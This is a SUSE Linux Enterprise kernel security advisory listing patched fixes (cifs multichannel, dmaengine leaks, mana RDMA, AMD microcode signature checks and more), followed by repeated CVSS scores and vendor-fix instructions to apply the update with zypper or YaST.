- can: gs_usb: gs_usb_receive_bulk_callback(): unanchor URL on usb_submit_urb() error (git-fixes).
- can: j1939: make j1939_session_activate() fail if device is no longer registered (stable-fixes).
- can: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: mcba_usb: mcba_usb_read_bulk_callback(): fix URB memory leak (git-fixes).
- can: usb_8dev: usb_8dev_read_bulk_callback(): fix URB memory leak (git-fixes).
- cifs: add new field to track the last access time of cfid (git-fixes).
- cifs: after disabling multichannel, mark tcon for reconnect (git-fixes).
- cifs: avoid redundant calls to disable multichannel (git-fixes).
- cifs: cifs_pick_channel should try selecting active channels (git-fixes).
- cifs: deal with the channel loading lag while picking channels (git-fixes).
- cifs: dns resolution is needed only for primary channel (git-fixes).
- cifs: do not disable interface polling on failure (git-fixes).
- cifs: do not search for channel if server is terminating (git-fixes).
- cifs: fix a pending undercount of srv_count (git-fixes).
- cifs: Fix copy offload to flush destination region (bsc#1252511).
- cifs: Fix flushing, invalidation and file size with copy_file_range() (bsc#1252511).
- cifs: fix lock ordering while disabling multichannel (git-fixes).
- cifs: fix stray unlock in cifs_chan_skip_or_disable (git-fixes).
- cifs: fix use after free for iface while disabling secondary channels (git-fixes).
- cifs: handle servers that still advertise multichannel after disabling (git-fixes).
- cifs: handle when server starts supporting multichannel (git-fixes).
- cifs: handle when server stops supporting multichannel (git-fixes).
- cifs: make cifs_chan_update_iface() a void function (git-fixes).
- cifs: make sure server interfaces are requested only for SMB3+ (git-fixes).
- cifs: make sure that channel scaling is done only once (git-fixes).
- cifs: reconnect worker should take reference on server struct unconditionally (git-fixes).
- cifs: reset connections for all channels when reconnect requested (git-fixes).
- cifs: reset iface weights when we cannot find a candidate (git-fixes).
- cifs: serialize other channels when query server interfaces is pending (git-fixes).
- cifs: update dstaddr whenever channel iface is updated (git-fixes).
- comedi: dmm32at: serialize use of paged registers (git-fixes).
- comedi: fix divide-by-zero in comedi_buf_munge() (stable-fixes).
- comedi: Fix getting range information for subdevices 16 to 255 (git-fixes).
- cpuset: fix warning when disabling remote partition (bsc#1256794).
- crypto: authencesn - reject too-short AAD (assoclen<8) to match ESP/ESN spec (git-fixes).
- dmaengine: apple-admac: Add 'apple,t8103-admac' compatible (git-fixes).
- dmaengine: at_hdmac: fix device leak on of_dma_xlate() (git-fixes).
- dmaengine: bcm-sba-raid: fix device leak on probe (git-fixes).
- dmaengine: dw: dmamux: fix OF node leak on route allocation failure (git-fixes).
- dmaengine: idxd: fix device leaks on compat bind and unbind (git-fixes).
- dmaengine: lpc18xx-dmamux: fix device leak on route allocation (git-fixes).
- dmaengine: omap-dma: fix dma_pool resource leak in error paths (git-fixes).
- dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() (git-fixes).
- dmaengine: sh: rz-dmac: Fix rz_dmac_terminate_all() (git-fixes).
- dmaengine: tegra-adma: Fix use-after-free (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on am335x route allocation (git-fixes).
- dmaengine: ti: dma-crossbar: fix device leak on dra7x route allocation (git-fixes).
- dmaengine: ti: k3-udma: fix device leak on udma lookup (git-fixes).
- dmaengine: xilinx_dma: Fix uninitialized addr_width when 'xlnx,addrwidth' property is missing (git-fixes).
- dmaengine: xilinx: xdma: Fix regmap max_register (git-fixes).
- dpll: fix device-id-get and pin-id-get to return errors properly (git-fixes).
- dpll: fix return value check for kmemdup (git-fixes).
- dpll: indent DPLL option type by a tab (git-fixes).
- dpll: Prevent duplicate registrations (git-fixes).
- dpll: spec: add missing module-name and clock-id to pin-get reply (git-fixes).
- drm/amd: Clean up kfd node on surprise disconnect (stable-fixes).
- drm/amd/display: Apply e4479aecf658 to dml (stable-fixes).
- drm/amd/display: Bump the HDMI clock to 340MHz (stable-fixes).
- drm/amd/display: Fix DP no audio issue (stable-fixes).
- drm/amd/display: Initialise backlight level values from hw (git-fixes).
- drm/amd/display: Respect user's CONFIG_FRAME_WARN more for dml files (stable-fixes).
- drm/amd/display: shrink struct members (stable-fixes).
- drm/amd/pm: Don't clear SI SMC table when setting power limit (git-fixes).
- drm/amd/pm: fix race in power state check before mutex lock (git-fixes).
- drm/amd/pm: fix smu overdrive data type wrong issue on smu 14.0.2 (git-fixes).
- drm/amd/pm: Workaround SI powertune issue on Radeon 430 (v2) (git-fixes).
- drm/amdgpu: Fix cond_exec handling in amdgpu_ib_schedule() (git-fixes).
- drm/amdgpu: fix NULL pointer dereference in amdgpu_gmc_filter_faults_remove (git-fixes).
- drm/amdgpu: Fix query for VPE block_type and ip_count (stable-fixes).
- drm/amdgpu: remove frame cntl for gfx v12 (stable-fixes).
- drm/amdkfd: fix a memory leak in device_queue_manager_init() (git-fixes).
- drm/amdkfd: Fix improper NULL termination of queue restore SMI event string (stable-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/imx/tve: fix probe device leak (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- drm/nouveau: add missing DCB connector types (git-fixes).
- drm/nouveau: implement missing DCB connector types; gracefully handle unknown connectors (git-fixes).
- drm/nouveau/disp: Set drm_mode_config_funcs.atomic_(check|commit) (stable-fixes).
- drm/nouveau/disp/nv50-: Set lock_core in curs507a_prepare (git-fixes).
- drm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel (git-fixes).
- drm/radeon: Remove __counted_by from ClockInfoArray.clockInfo[] (stable-fixes).
- drm/vmwgfx: Fix an error return check in vmw_compat_shader_add() (git-fixes).
- drm/vmwgfx: Merge vmw_bo_release and vmw_bo_free functions (git-fixes).
- exfat: check return value of sb_min_blocksize in exfat_read_boot_sector (git-fixes).
- exfat: fix remount failure in different process environments (git-fixes).
- gpio: omap: do not register driver in probe() (git-fixes).
- gpio: pca953x: Add support for level-triggered interrupts (stable-fixes).
- gpio: pca953x: fix wrong error probe return value (git-fixes).
- gpio: pca953x: handle short interrupt pulses on PCAL devices (git-fixes).
- gpio: pca953x: Utilise dev_err_probe() where it makes sense (stable-fixes).
- gpio: pca953x: Utilise temporary variable for struct device (stable-fixes).
- gpio: rockchip: Stop calling pinctrl for set_direction (git-fixes).
- HID: usbhid: paper over wrong bNumDescriptor field (stable-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- iio: accel: iis328dq: fix gain values (git-fixes).
- iio: adc: ad7280a: handle spi_setup() errors in probe() (git-fixes).
- iio: adc: ad9467: fix ad9434 vref mask (git-fixes).
- iio: adc: at91-sama5d2_adc: Fix potential use-after-free in sama5d2_adc driver (git-fixes).
- iio: dac: ad5686: add AD5695R to ad5686_chip_info_tbl (git-fixes).
- iio: imu: st_lsm6dsx: fix iio_chan_spec for sensors without event detection (git-fixes).
- Input: i8042 - add quirk for ASUS Zenbook UX425QA_UM425QA (stable-fixes).
- Input: i8042 - add quirks for MECHREVO Wujie 15X Pro (stable-fixes).
- intel_th: fix device leak on output open() (git-fixes).
- leds: led-class: Only Add LED to leds_list when it is fully ready (git-fixes).
- lib/crypto: aes: Fix missing MMU protection for AES S-box (git-fixes).
- mei: me: add nova lake point S DID (stable-fixes).
- mei: me: add wildcat lake P DID (stable-fixes).
- mISDN: annotate data-race around dev->work (git-fixes).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1253087).
- mmc: rtsx_pci_sdmmc: implement sdmmc_card_busy function (git-fixes).
- mmc: sdhci-of-dwcmshc: Prevent illegal clock reduction in HS200/HS400 mode (git-fixes).
- net: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts (git-fixes).
- net: hv_netvsc: reject RSS hash key programming without RX indirection table (bsc#1257473).
- net: mana: Add metadata support for xdp mode (git-fixes).
- net: mana: Add standard counter rx_missed_errors (git-fixes).
- net: mana: Add support for auxiliary device servicing events (git-fixes).
- net: mana: Change the function signature of mana_get_primary_netdev_rcu (bsc#1256690).
- net: mana: Drop TX skb on post_work_request failure and unmap resources (git-fixes).
- net: mana: fix spelling for mana_gd_deregiser_irq() (git-fixes).
- net: mana: Fix use-after-free in reset service rescan path (git-fixes).
- net: mana: Fix warnings for missing export.h header inclusion (git-fixes).
- net: mana: Handle hardware recovery events when probing the device (git-fixes).
- net: mana: Handle Reset Request from MANA NIC (git-fixes).
- net: mana: Handle SKB if TX SGEs exceed hardware limit (git-fixes).
- net: mana: Handle unsupported HWC commands (git-fixes).
- net: mana: Move hardware counter stats from per-port to per-VF context (git-fixes).
- net: mana: Probe rdma device in mana driver (git-fixes).
- net: mana: Reduce waiting time if HWC not responding (git-fixes).
- net: tcp: allow zero-window ACK update the window (bsc#1254767).
- net: usb: dm9601: remove broken SR9700 support (git-fixes).
- net: wwan: t7xx: fix potential skb->frags overflow in RX path (git-fixes).
- nfc: llcp: Fix memleak in nfc_llcp_send_ui_frame() (git-fixes).
- nfc: nci: Fix race between rfkill and nci_unregister_device() (git-fixes).
- NFS: Fix up the automount fs_context to use the correct cred (git-fixes).
- nfsd: Drop the client reference in client_states_open() (git-fixes).
- NFSD: Fix permission check for read access to executable-only files (git-fixes).
- NFSD: use correct reservation type in nfsd4_scsi_fence_client (git-fixes).
- NFSD/blocklayout: Fix minlength check in proc_layoutget (git-fixes).
- NFSv4: ensure the open stateid seqid doesn't go backwards (git-fixes).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- nvmet-auth: update sc_c in host response (git-fixes).
- nvmet-auth: update sc_c in target host hash calculation (git-fixes).
- of: fix reference count leak in of_alias_scan() (git-fixes).
- of: platform: Use default match table for /firmware (git-fixes).
- phy: freescale: imx8m-pcie: assert phy reset during power on (stable-fixes).
- phy: rockchip: inno-usb2: fix communication disruption in gadget mode (git-fixes).
- phy: rockchip: inno-usb2: fix disconnection in gadget mode (git-fixes).
- phy: stm32-usphyc: Fix off by one in probe() (git-fixes).
- phy: tegra: xusb: Explicitly configure HS_DISCON_LEVEL to 0x7 (git-fixes).
- platform/x86: hp-bioscfg: Fix automatic module loading (git-fixes).
- platform/x86: hp-bioscfg: Fix kernel panic in GET_INSTANCE_ID macro (git-fixes).
- platform/x86: hp-bioscfg: Fix kobject warnings for empty attribute names (git-fixes).
- platform/x86/amd: Fix memory leak in wbrf_record() (git-fixes).
- pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() (git-fixes).
- powercap: fix race condition in register_control_type() (stable-fixes).
- powercap: fix sscanf() error return value handling (stable-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- RDMA/mana_ib: Access remote atomic for MRs (git-fixes).
- RDMA/mana_ib: add additional port counters (git-fixes).
- RDMA/mana_ib: Add device statistics support (git-fixes).
- RDMA/mana_ib: Add port statistics support (git-fixes).
- RDMA/mana_ib: Add support of 4M, 1G, and 2G pages (git-fixes).
- RDMA/mana_ib: Add support of mana_ib for RNIC and ETH nic (git-fixes).
- RDMA/mana_ib: add support of multiple ports (git-fixes).
- RDMA/mana_ib: Allow registration of DMA-mapped memory in PDs (git-fixes).
- RDMA/mana_ib: check cqe length for kernel CQs (git-fixes).
- RDMA/mana_ib: Create and destroy UD/GSI QP (git-fixes).
- RDMA/mana_ib: create kernel-level CQs (git-fixes).
- RDMA/mana_ib: create/destroy AH (git-fixes).
- RDMA/mana_ib: Drain send wrs of GSI QP (git-fixes).
- RDMA/mana_ib: extend mana QP table (git-fixes).
- RDMA/mana_ib: Extend modify QP (git-fixes).
- RDMA/mana_ib: Fix error code in probe() (git-fixes).
- RDMA/mana_ib: Fix integer overflow during queue creation (git-fixes).
- RDMA/mana_ib: Handle net event for pointing to the current netdev (bsc#1256690).
- RDMA/mana_ib: helpers to allocate kernel queues (git-fixes).
- RDMA/mana_ib: Implement DMABUF MR support (git-fixes).
- RDMA/mana_ib: implement get_dma_mr (git-fixes).
- RDMA/mana_ib: implement req_notify_cq (git-fixes).
- RDMA/mana_ib: indicate CM support (git-fixes).
- RDMA/mana_ib: polling of CQs for GSI/UD (git-fixes).
- RDMA/mana_ib: Query feature_flags bitmask from FW (git-fixes).
- RDMA/mana_ib: request error CQEs when supported (git-fixes).
- RDMA/mana_ib: support of the zero based MRs (git-fixes).
- RDMA/mana_ib: UD/GSI QP creation for kernel (git-fixes).
- RDMA/mana_ib: UD/GSI work requests (git-fixes).
- RDMA/mana_ib: unify mana_ib functions to support any gdma device (git-fixes).
- RDMA/mana_ib: Use safer allocation function() (git-fixes).
- regmap: Fix race condition in hwspinlock irqsave routine (git-fixes).
- sched: Increase sched_tick_remote timeout (bsc#1254510).
- sched/rt: Skip group schedulable check with rt_group_sched=0 (bsc#1256568).
- scripts: obsapi: Support URL trailing / in oscrc.
- scripts: teaapi: Add paging.
- scripts: uploader: Fix no change condition for _maintainership.json.
- scripts: uploader: Handle missing upstream in is_pr_open.
- scripts/python/git_sort/git_sort.yaml: add cifs for-next repository.
- scrits: teaapi: Add list_repos.
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256861).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256861).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256863).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256863).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256863).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256863).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256863).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256863).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256863).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256863).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256863).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256863).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256863).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256863).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- selftests/bpf: Fix flaky bpf_cookie selftest (git-fixes).
- serial: 8250_pci: Fix broken RS485 for F81504/508/512 (git-fixes).
- slimbus: core: fix device reference leak on report present (git-fixes).
- slimbus: core: fix OF node leak on registration failure (git-fixes).
- slimbus: core: fix of_slim_get_device() kernel doc (git-fixes).
- slimbus: core: fix runtime PM imbalance on report present (git-fixes).
- smb: change return type of cached_dir_lease_break() to bool (git-fixes).
- smb: client: ensure open_cached_dir_by_dentry() only returns valid cfid (git-fixes).
- smb: client: fix cifs_pick_channel when channel needs reconnect (git-fixes).
- smb: client: fix warning when reconnecting channel (git-fixes).
- smb: client: introduce close_cached_dir_locked() (git-fixes).
- smb: client: remove unused fid_lock (git-fixes).
- smb: client: short-circuit in open_cached_dir_by_dentry() if !dentry (git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- smb3: add missing null server pointer check (git-fixes).
- spi: spi-sprd-adi: Fix double free in probe error path (git-fixes).
- spi: sprd-adi: switch to use spi_alloc_host() (stable-fixes).
- spi: sprd: adi: Use devm_register_restart_handler() (stable-fixes).
- svcrdma: return 0 on success from svc_rdma_copy_inline_range (git-fixes).
- uacce: ensure safe queue release with state management (git-fixes).
- uacce: fix cdev handling in the cleanup path (git-fixes).
- uacce: fix isolate sysfs check condition (git-fixes).
- uacce: implement mremap in uacce_vm_ops to return -EPERM (git-fixes).
- usb: core: add USB_QUIRK_NO_BOS for devices that hang on BOS descriptor (stable-fixes).
- usb: dwc3: Check for USB4 IP_NAME (stable-fixes).
- USB: OHCI/UHCI: Add soft dependencies on ehci_platform (stable-fixes).
- USB: serial: ftdi_sio: add support for PICAXE AXE027 cable (stable-fixes).
- USB: serial: option: add Telit LE910 MBIM composition (stable-fixes).
- usbnet: limit max_mtu based on device's hard_mtu (git-fixes).
- w1: fix redundant counter decrement in w1_attach_slave_device() (git-fixes).
- w1: therm: Fix off-by-one buffer overflow in alarms_store (git-fixes).
- wifi: ath10k: fix dma_free_coherent() pointer (git-fixes).
- wifi: ath12k: fix dma_free_coherent() pointer (git-fixes).
- wifi: mac80211: correctly decode TTLM with default link map (git-fixes).
- wifi: mac80211: don't perform DA check on S1G beacon (git-fixes).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- wifi: rsi: Fix memory corruption due to not set vif driver data size (git-fixes).
- x86: make page fault handling disable interrupts properly (git-fixes).
- x86/microcode: Fix Entrysign revision check for Zen1/Naples (bsc#1256528).
- x86/microcode/AMD: Add more known models to entry sign checking (bsc#1256528).
- x86/microcode/AMD: Add some forgotten models to the SHA check (bsc#1256528).
- x86/microcode/AMD: Add TSA microcode SHAs (bsc#1256528).
- x86/microcode/AMD: Add Zen5 model 0x44, stepping 0x1 minrev (bsc#1256528).
- x86/microcode/AMD: Clean the cache if update did not load microcode (bsc#1256528).
- x86/microcode/AMD: Extend the SHA check to Zen5, block loading of any unreleased standalone Zen5 microcode patches (bsc#1256528).
- x86/microcode/AMD: Fix __apply_microcode_amd()'s return value (bsc#1256528).
- x86/microcode/AMD: Fix Entrysign revision check for Zen5/Strix Halo (bsc#1256528).
- x86/microcode/AMD: Limit Entrysign signature checking to known generations (bsc#1256528).
- x86/microcode/AMD: Load only SHA256-checksummed patches (bsc#1256528).
- x86/microcode/AMD: Use sha256() instead of init/update/final (bsc#1256528).
Patchnames: SUSE-2026-447,SUSE-SLE-Module-Basesystem-15-SP7-2026-447,SUSE-SLE-Module-Development-Tools-15-SP7-2026-447,SUSE-SLE-Module-Legacy-15-SP7-2026-447,SUSE-SLE-Module-Live-Patching-15-SP7-2026-447,SUSE-SLE-Product-HA-15-SP7-2026-447,SUSE-SLE-Product-WE-15-SP7-2026-447
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.3 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
